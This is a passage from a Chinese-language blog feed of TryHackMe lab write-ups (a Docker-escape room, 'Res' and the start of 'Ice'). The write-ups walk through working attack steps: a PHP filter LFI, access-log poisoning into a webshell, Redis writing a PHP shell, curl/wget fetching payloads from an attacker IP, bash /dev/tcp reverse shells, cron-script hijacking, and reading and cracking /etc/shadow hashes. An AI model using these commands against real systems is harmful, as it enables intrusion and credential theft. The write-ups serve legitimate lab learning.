&lt;li&gt;http://10.10.221.153/&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/53275-60cFGhz.png"&gt;&lt;/li&gt;
&lt;li&gt;會發現可以選狗勾或貓貓選貓貓會出現&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/97754-JGEBCKB.png"&gt;&lt;/li&gt;
&lt;li&gt;網址是 &lt;code&gt;http://10.10.221.153/?view=cat&lt;/code&gt;選狗勾- 網址是 &lt;code&gt;http://10.10.221.153/?view=dog&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;del&gt;不要問我為什麼不幫狗勾截圖&lt;/del&gt;嘗試 LFI- 這邊可以套一個 php 的 LFI 老梗 PHP Wrapper&lt;code&gt;http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=cat&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cfee8-IaYSGCc.png"&gt;&lt;/li&gt;
&lt;li&gt;可以發現成功噴出了一堆 base64&lt;code&gt;PGltZyBzcmM9ImNhdHMvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;解碼後發現是 &lt;code&gt;.jpg&amp;quot; /&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;而同理解碼狗勾是 &lt;code&gt;.jpg&amp;quot; /&amp;gt;&lt;/code&gt;繞狗勾- 假設我們想要看 &lt;code&gt;/etc/passwd``http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=/etc/passwd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/59c56-V6btRdB.png"&gt;&lt;/li&gt;
&lt;li&gt;他會說 &lt;code&gt;Sorry, only dogs or cats are allowed.&lt;/code&gt;而如果我們輸入 &lt;code&gt;/etc/passwddog&lt;/code&gt;- 他會回傳 &lt;code&gt;Here you go!&lt;/code&gt; 但是噴一些錯誤&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8148b-BIxMS50.png"&gt;&lt;/li&gt;
&lt;li&gt;因為找不到檔案，所以錯誤很合理那我們嘗試亂寫奇怪的路徑看看- &lt;code&gt;http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=./dog/../dog&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;會發現可以成功開啟狗勾嘗試觀察 &lt;code&gt;index.php&lt;/code&gt; 內容 這邊只截錄重點&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-php" data-lang="php"&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;可以發現參數 &lt;code&gt;ext&lt;/code&gt; 很重要我們可以透過給予 &lt;code&gt;ext&lt;/code&gt; 空白繞過副檔名任意 LFI- &lt;code&gt;http://10.10.221.153/?ext=&amp;amp;view=php://filter/convert.base64-encode/resource=./dog/../index.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;http://10.10.221.153/?ext=&amp;amp;view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/passwd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;http://10.10.221.153/?ext=&amp;amp;view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/apache2/apache2.conf&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;http://10.10.221.153/?ext=&amp;amp;view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../var/log/apache2/access.log&lt;/code&gt;可以發現 &lt;code&gt;access.log&lt;/code&gt; 可讀&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9242b-ll0cYjt.png"&gt;&lt;/li&gt;
&lt;li&gt;可以透過 &lt;code&gt;access.log&lt;/code&gt; 來做到 LFI 2 RCELFI 2 RCE- 如果在瀏覽器輸入這個&lt;code&gt;10.10.221.153?A=&lt;/code&gt;在 log 上會變成這樣- &lt;code&gt;/?A=%3C?php%20phpinfo();%20?%3C/php%3E&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;主要是因為 HTTP 會做到 URL Encode所以可以用 nc- &lt;code&gt;nc 10.10.221.153 80&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GET /MEOW?&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/61b12-JXxg8vP.png"&gt;成功!寫入 webshell- &lt;code&gt;nc 10.10.221.153 80&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GET /MEOW?&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d7432-o2cJEwA.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;http://10.10.221.153/?ext=&amp;amp;view=./dog/../../../../../../../var/log/apache2/access.log&amp;amp;A=curl%20-o%20/tmp/s%20http://10.13.21.55:8000/s&lt;/code&gt;載入 reverse shell&lt;/li&gt;
&lt;li&gt;在這邊發現這台電腦沒有 wget，所以用 curl&lt;code&gt;http://10.10.221.153/?ext=&amp;amp;view=./dog/../../../../../../../var/log/apache2/access.log&amp;amp;A=bash%20/tmp/s&lt;/code&gt;- 執行 reverse shell&lt;/li&gt;
&lt;li&gt;本地 &lt;code&gt;nc -vlk 7877&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;就可以順利接到 Shell ㄌ!&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="shell"&gt;Shell&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;在&lt;code&gt;/var/www/flag.php&lt;/code&gt;可以找到 flag1&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6d0ed-1HiNozU.png"&gt;在 &lt;code&gt;/var/www/flag.php&lt;/code&gt;- 可以找到 flag2&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/929e3-rYiIpeP.png"&gt;嘗試提權- 輸入 &lt;code&gt;sudo -l&lt;/code&gt; 可以發現我們可以用 root 來 run &lt;code&gt;/usr/bin/env&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d41a4-ELIv9bq.png"&gt;這邊有兩種用法&lt;code&gt;/usr/bin/env ls /root&lt;/code&gt;就可以用 roo 來 &lt;code&gt;ls /root&lt;/code&gt;也可以參考 gtfobins- 有 suid 的 env&lt;/li&gt;
&lt;li&gt;&lt;code&gt;env /usr/bin/sh -p&lt;/code&gt;取得 root flag (flag3)- &lt;code&gt;THM{D1ff3r3nt_3nv1ronments_874112}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="docker-提權"&gt;Docker 提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;不管了，先老梗的 linpeas 下去&lt;code&gt;curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/usr/bin/env /tmp/linpeas.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d7cdf-PlO1XxZ.png"&gt;可以發現根目錄有 &lt;code&gt;/.dockerenv&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;確定目前我們在docker中發現備份檔案- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/df514-DXOTRMs.png"&gt;&lt;/li&gt;
&lt;li&gt;發現有 &lt;code&gt;backup.tar&lt;/code&gt; 跟 &lt;code&gt;backup.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;試著把檔案複製到 &lt;code&gt;/var/www/html&lt;/code&gt; 來準備下載&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/be9b6-gZ2rLz8.png"&gt;下載並觀察備份檔案- &lt;code&gt;wget http://10.10.221.153/backup.tar&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;tar xf backup.tar&lt;/code&gt;觀察 Docker File- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cbdc7-M4K7rpx.png"&gt;發現沒什麼特別&lt;/li&gt;
&lt;li&gt;但也發現為什麼 access log 一直有噴一個 &lt;code&gt;127.0.0.1&lt;/code&gt; 的 curl觀察 &lt;code&gt;launch.sh&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6d52c-U0Sdayw.png"&gt;&lt;/li&gt;
&lt;li&gt;發現重點!!&lt;/li&gt;
&lt;li&gt;他把 &lt;code&gt;/opt/backup&lt;/code&gt; 掛載到本地的&lt;code&gt;/root/container/backup&lt;/code&gt;所以我在 &lt;code&gt;/opt/backup&lt;/code&gt; 寫資料會跑到本地端那問題就只剩下，我們怎麼讓本地執行觀察 &lt;code&gt;backup.sh&lt;/code&gt;- 發現裡面就 &lt;code&gt;tar cf /root/container/backup/backup.tar /root/container&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;但……本地端是怎麼執行的ㄋ??&lt;/li&gt;
&lt;li&gt;突然發現上面的 &lt;code&gt;backup.tar&lt;/code&gt; 就剛好是當前時間!所以可以推測說在遠端有一個 cron job寫入 &lt;code&gt;backup.sh&lt;/code&gt;- 戳一個 reverse shell&lt;code&gt;echo &amp;quot;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7878 0&amp;gt;&amp;amp;1'&amp;quot; &amp;gt;&amp;gt; backup.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a40e8-i6PxwrU.png"&gt;本地端開 &lt;code&gt;nc -vlk 7878&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/345f2-J26jyNB.png"&gt;拿到本地 root shell! (flag4)- &lt;code&gt;THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Res (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/01/res-try-hack-me-writeup/</link><pubDate>Sun, 01 Aug 2021 13:13:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/01/res-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/res"&gt;https://tryhackme.com/room/res&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.149.195&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;先來老梗的 &lt;code&gt;nmap -A 10.10.149.195``Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-01 01:29 EDT Nmap scan report for 10.10.149.195 Host is up (0.29s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works ![](https://i.imgur.com/3PG5lnw.png)``python3 dirsearch.py -u http://10.10.149.195/ -e all&lt;/code&gt;- 發現完全沒東西Scan the machine, how many ports are open?- 理論上要掃全部的 port&lt;/li&gt;
&lt;li&gt;&lt;code&gt;nmap -p- 10.10.149.195&lt;/code&gt;雖然很有效果，但很浪費時間 QQ&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/64807-pXT3iBK.png"&gt;掃ㄌ將近 20 分鐘QQ因為喵到下面說 port 是 &lt;code&gt;****&lt;/code&gt;- 所以我猜測是 &lt;code&gt;1000~9999&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;nmap -p 1000-9999 10.10.149.195&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e56a1-DOdP5oL.png"&gt;答案 &lt;code&gt;6379&lt;/code&gt;~其實這題題目跟 logo 就很明顯ㄌ~~Scan the machine, how many ports are open?- 2 個 port&lt;/li&gt;
&lt;li&gt;80 與 6379What&amp;rsquo;s is the database management system installed on the server?- 6379 是 &lt;code&gt;redis&lt;/code&gt;What port is the database management system running on?- &lt;code&gt;6379&lt;/code&gt;What&amp;rsquo;s is the version of management system installed on the server?- &lt;code&gt;nmap -p6379 -A 10.10.149.195&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cc864-U3zpxcL.png"&gt;&lt;/li&gt;
&lt;li&gt;可以看到是 &lt;code&gt;6.0.7&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;嘗試 Google 過，找不到這個版本的 Exploit&lt;/li&gt;
&lt;li&gt;找不到 exploit&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="寫入-shell"&gt;寫入 shell&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;使用 redis cli 連上&lt;code&gt;redis-cli -h 10.10.149.195&lt;/code&gt;進行連線&lt;code&gt;config set dir &amp;quot;/var/www/html&amp;quot;``config set dbfilename meow.php``set x &amp;quot;\r\n\r\n\r\n\r\n&amp;quot;``save&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ec588-JcdaDCJ.png"&gt;成功寫入 phpinfo寫入 web shell- &lt;code&gt;config set dbfilename shell.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;set x &amp;quot;\r\n\r\n\r\n\r\n&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;save&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/685ff-O4CuqmG.png"&gt;成功寫入 webshell 且可以使用 ls上傳 reverse shell- 本地端準備&lt;code&gt;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7877 0&amp;gt;&amp;amp;1'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;存在 &lt;code&gt;s&lt;/code&gt; 檔案中&lt;/li&gt;
&lt;li&gt;並使用 &lt;code&gt;python3 -m http.server&lt;/code&gt; 開啟網頁伺服器&lt;code&gt;http://10.10.149.195/shell.php?A=wget 10.13.21.55:8000/s -O /tmp/s&lt;/code&gt;- 把檔案存下來&lt;code&gt;http://10.10.149.195/shell.php?A=cat%20/tmp/s&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9a85b-4NSeNM8.png"&gt;&lt;/li&gt;
&lt;li&gt;確認寫入正常執行 reverse shell- 本地端準備 &lt;code&gt;nc -vlk 7877&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;訪問 &lt;code&gt;http://10.10.149.195/shell.php?A=bash%20/tmp/s&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b1ff7-yg4T57M.png"&gt;&lt;/li&gt;
&lt;li&gt;成功接上 reverse shell本地亂逛- &lt;code&gt;python -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;/code&gt;互動式 bash尋找 user flag- 檔案在 &lt;code&gt;/home/vianka/user.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/754d9-8fMHD4J.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;thm{red1s_rce_w1thout_credent1als}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Linpeas&lt;code&gt;wget 10.13.21.55:8000/linpeas.sh&lt;/code&gt;下載 linpeas&lt;code&gt;bash linpeas.sh | tee out.txt&lt;/code&gt;- 執行發現有標顏色的 suid- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6aed7-ns4piX0.png"&gt;&lt;/li&gt;
&lt;li&gt;xxdsuid xxd 提權- gtfobins 找到 suid xxd 讀檔https://gtfobins.github.io/gtfobins/xxd/#suid要破解密碼的話可以破 &lt;code&gt;/etc/shadow&lt;/code&gt; 的 hash- &lt;code&gt;LFILE=/etc/shadow&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;xxd &amp;quot;$LFILE&amp;quot; | xxd -r&lt;/code&gt;可以順利回傳 &lt;code&gt;/etc/shadow&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ea827-nxX3vgl.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::&lt;/code&gt;爆破密碼- 複製 vianka 的 hash 到本地端&lt;/li&gt;
&lt;li&gt;呼叫約翰&lt;code&gt;john j.txt --wordlist=/opt/rockyou.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/67d58-tXqClMc.png"&gt;&lt;/li&gt;
&lt;li&gt;成功破解密碼為 &lt;code&gt;beautiful1&lt;/code&gt;切換使用者- &lt;code&gt;su vianka&lt;/code&gt;切換使用者，並切換密碼為 &lt;code&gt;beautiful1&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/19bb4-xhOUOpr.png"&gt;確認權限- 輸入 &lt;code&gt;sudo -l&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6a515-uDeeXfv.png"&gt;&lt;/li&gt;
&lt;li&gt;發現使用者可以用 &lt;code&gt;sudo&lt;/code&gt;使用 &lt;code&gt;sudo su&lt;/code&gt; 切換到 root成功取得 root flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6e9b0-pzGRECw.png"&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Ice (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/31/ice-try-hack-me-writeup/</link><pubDate>Sat, 31 Jul 2021 23:59:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/31/ice-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL: &lt;a href="https://tryhackme.com/room/ice"&gt;https://tryhackme.com/room/ice&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;題目建議使用 SYN Scanhttps://nmap.org/book/synscan.html&lt;/li&gt;
&lt;li&gt;可以發現指令是 &lt;code&gt;-sS&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sudo nmap -sS 10.10.209.59&lt;/code&gt;需要 root 權限 所以 sudo&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;└─$ sudo nmap -sS 10.10.209.59
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[sudo] password for kali:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-31 08:58 EDT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap scan report for 10.10.209.59
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host is up (0.27s latency).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Not shown: 988 closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PORT STATE SERVICE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;135/tcp open msrpc
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;139/tcp open netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;445/tcp open microsoft-ds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;3389/tcp open ms-wbt-server
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;5357/tcp open wsdapi
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;8000/tcp open http-alt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49152/tcp open unknown
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49153/tcp open unknown
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49154/tcp open unknown
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49158/tcp open unknown
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49159/tcp open unknown
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49160/tcp open unknown
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;不管，還是run一次習慣的 &lt;code&gt;-A&lt;/code&gt; 看看&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo nmap -A 10.10.209.59
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-31 09:00 EDT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Traceroute Timing: About 32.26% done; ETC: 09:02 (0:00:00 remaining)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap scan report for 10.10.209.59
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host is up (0.28s latency).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Not shown: 988 closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PORT STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;135/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;139/tcp open netbios-ssn Microsoft Windows netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;3389/tcp open tcpwrapped
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| ssl-cert: Subject: commonName=Dark-PC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Not valid before: 2021-07-30T12:49:58
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_Not valid after: 2022-01-29T12:49:58
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ssl-date: 2021-07-31T13:02:27+00:00; 0s from scanner time.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-server-header: Microsoft-HTTPAPI/2.0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: Service Unavailable
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;8000/tcp open http Icecast streaming media server
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: Site doesn&amp;#39;t have a title (text/html).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49152/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49153/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49154/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49158/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49159/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49160/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;TCP/IP fingerprint:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:SCAN(V=7.91%E=4%D=7/31%OT=135%CT=1%CU=30419%PV=Y%DS=4%DC=T%G=Y%TM=610549
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:E3%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:=7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:506NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OS:=N%T=80%CD=Z)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Network Distance: 4 hops
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host script results:
